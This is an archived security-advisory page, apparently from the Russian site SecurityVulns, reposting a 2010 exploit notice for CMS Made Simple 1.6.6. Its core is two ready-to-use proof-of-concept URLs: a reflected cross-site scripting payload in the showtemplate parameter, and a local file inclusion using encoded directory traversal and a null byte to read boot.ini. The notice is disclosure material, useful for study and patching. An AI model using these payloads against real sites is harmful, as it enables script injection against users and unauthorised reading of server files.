Информационная безопасность

Уведомление о безопасности: cmsmadesimple Multiple Security Issues : XSS+ LFI
back  новости / статьи / форум / программы / реклама / поиск / эксплоиты  forward
[RU] switch to
English Version



Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  Information disclosure vulnerability in Drupal's Realname User Reference Widget contributed module (version 6.x-1.0)

  Joomla (Jw_allVideos)
Remote File Download Vulnerability

  Multiple Stored XSS in XOOPS 2.4.4 Admin Section

  LDF (Default.
asp) Sql Injection Vulnerability

From:beenudel1986_(at)_gmail.com <beenudel1986_(at)_gmail.com>
Date:16 февраля 2010 г.
Subject:cmsmadesimple Multiple Security Issues : XSS+ LFI

                                                                    
                                                                    
                                                                    
                                            
################################################################
#       .___             __          _______       .___        #
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    #
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   #
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   #
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   #
#        \/                  \/             \/                 #
#                   ___________   ______  _  __                #
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                #
#                 \  \___|  | \/\  ___/\     /                 #
#                  \___  >__|    \___  >\/\_/                  #
#      est.2007        \/            \/   forum.darkc0de.com   #
################################################################
# Greetz to all Darkc0de ,AI,ICW, AH Memebers
# Shoutz to r45c4l,j4ckh4x0r,silic0n,smith,baltazar,d3hydr8,FB1H2S, lowlz,Eberly,Sumit,
#
# Author: Beenu Arora
#
# Home  : www.BeenuArora.com
#
# Email : beenudel1986@gmail.com
#
# Share the c0de!
#
################################################################
#
# Exploit: Multiple Vulnerablities in cmsmadesimple
#
# AppSite: http://www.cmsmadesimple.com/
#
# Tested Version : 1.6.6
# XSS
#
#
POC:-http://localhost/cmsmadesimple/index.php?page=tags-in-the-
core&showtemplate=false"><script>alert('XSS')<
/script>
#
#
#
# Multiple Local File Inclusion
#
# Sample URL:
#
POC:-http://localhost:80/cmsmadesimple/index.
php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..
%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..
%5c%5cboot.
ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt
01returnid=39
#
#
################################################################

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 


Rating@Mail.ru
test server